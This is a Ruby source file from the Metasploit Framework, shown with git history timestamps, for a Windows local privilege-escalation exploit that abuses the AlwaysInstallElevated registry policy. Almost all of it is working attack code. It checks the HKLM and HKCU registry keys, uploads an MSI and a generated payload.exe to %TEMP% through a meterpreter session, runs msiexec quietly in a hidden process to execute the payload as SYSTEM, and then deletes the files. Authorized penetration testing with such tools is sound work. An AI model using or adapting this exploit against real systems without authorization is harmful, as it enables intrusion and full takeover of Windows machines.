metasploit-framework/modules/exploits/windows/local/always_install_elevated.rb

156 lines
4.6 KiB
Ruby
Raw Normal View History

2012-11-22 10:26:23 +00:00
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
# http://metasploit.com/
##
require 'msf/core'
require 'rex'
require 'msf/core/post/windows/registry'
class Metasploit3 < Msf::Exploit::Local
Rank = AverageRanking
include Msf::Exploit::EXE
include Msf::Post::Windows::Registry
def initialize(info={})
super(update_info(info, {
'Name' => 'Windows AlwaysInstallElevated MSI',
'Description' => %q{
This module checks the AlwaysInstallElevated registry keys which
dictate if .MSI files should be installed with elevated privileges
(NT AUTHORITY\SYSTEM).
The default MSI file is data/post/exec_payload.msi with the WiX source
file under data/post/exec_payload_source/. This MSI simply executes
payload.exe within the same folder.
The MSI may not execute succesfully successive times.
2012-11-27 18:31:54 +00:00
MSI can be rebuilt from the source using the WIX tool with the following commands:
candle exec_payload.wxs
light exec_payload.wixobj
Source: external/source/exploits/exec_payload_msi/exec_payload.wxs
2012-11-22 10:26:23 +00:00
},
'License' => MSF_LICENSE,
'Author' =>
[
'Ben Campbell',
'Parvez Anwar' # discovery
],
'Arch' => [ ARCH_X86, ARCH_X86_64 ],
'Platform' => [ 'win' ],
'SessionTypes' => [ 'meterpreter' ],
'DefaultOptions' =>
{
'WfsDelay' => 10,
'EXITFUNC' => 'thread',
},
'Targets' =>
[
[ 'Windows', { } ],
],
'References' =>
[
[ 'URL', 'http://www.greyhathacker.net/?p=185' ],
[ 'URL', 'http://msdn.microsoft.com/en-us/library/aa367561(VS.85).aspx' ],
[ 'URL', 'http://wix.sourceforge.net'] ,
],
'DisclosureDate'=> 'Mar 18 2010',
'DefaultTarget' => 0
}))
register_advanced_options([
OptString.new('LOG_FILE', [false, 'Path to output MSI log file to.', nil]),
], self.class)
end
2012-11-22 10:34:05 +00:00
2012-11-22 10:26:23 +00:00
def check
install_elevated = "AlwaysInstallElevated"
installer = "SOFTWARE\\Policies\\Microsoft\\Windows\\Installer"
hkcu = "HKEY_CURRENT_USER\\#{installer}"
hklm = "HKEY_LOCAL_MACHINE\\#{installer}"
local_machine_value = registry_getvaldata(hklm,install_elevated)
if local_machine_value.nil?
print_error("#{hklm}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif local_machine_value == 0
print_error("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hklm}\\#{install_elevated} is #{local_machine_value}.")
current_user_value = registry_getvaldata(hkcu,install_elevated)
if current_user_value.nil?
print_error("#{hkcu}\\#{install_elevated} does not exist or is not accessible.")
return Msf::Exploit::CheckCode::Safe
elsif current_user_value == 0
print_error("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Safe
else
print_good("#{hkcu}\\#{install_elevated} is #{current_user_value}.")
return Msf::Exploit::CheckCode::Vulnerable
end
end
end
def cleanup
if @executed
begin
print_status("Deleting MSI...")
session.fs.file.delete(@msi_destination)
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
end
begin
print_status("Deleting Payload...")
session.fs.file.delete(@payload_destination)
rescue Rex::Post::Meterpreter::RequestError => e
print_error(e.to_s)
end
end
end
def exploit
@executed = false
if check == Msf::Exploit::CheckCode::Vulnerable
@executed = true
msi_filename = Rex::Text.rand_text_alpha((rand(8)+6)) + ".msi"
2012-11-27 18:12:49 +00:00
msi_source = ::File.join(Msf::Config.install_root, "data", "exploits", "exec_payload.msi")
2012-11-22 10:26:23 +00:00
# Upload MSI
@msi_destination = "#{session.fs.file.expand_path("%TEMP%")}\\#{msi_filename}"
print_status("Uploading the MSI to #{@msi_destination} ...")
session.fs.file.upload_file(@msi_destination, msi_source)
# Upload payload
payload = generate_payload_exe
@payload_destination = "#{session.fs.file.expand_path("%TEMP%")}\\payload.exe"
print_status("Uploading the Payload to #{@payload_destination} ...")
fd = client.fs.file.new(@payload_destination, "wb")
fd.write(payload)
fd.close
# Execute MSI
print_status("Executing MSI...")
if datastore['LOG_FILE'].nil?
logging = ""
else
logging = "/l* #{datastore['LOG_FILE']} "
end
cmd = "msiexec.exe #{logging}/quiet /passive /n /package #{@msi_destination}"
vprint_status(cmd)
session.sys.process.execute(cmd, nil, {'Hidden' => true})
end
end
end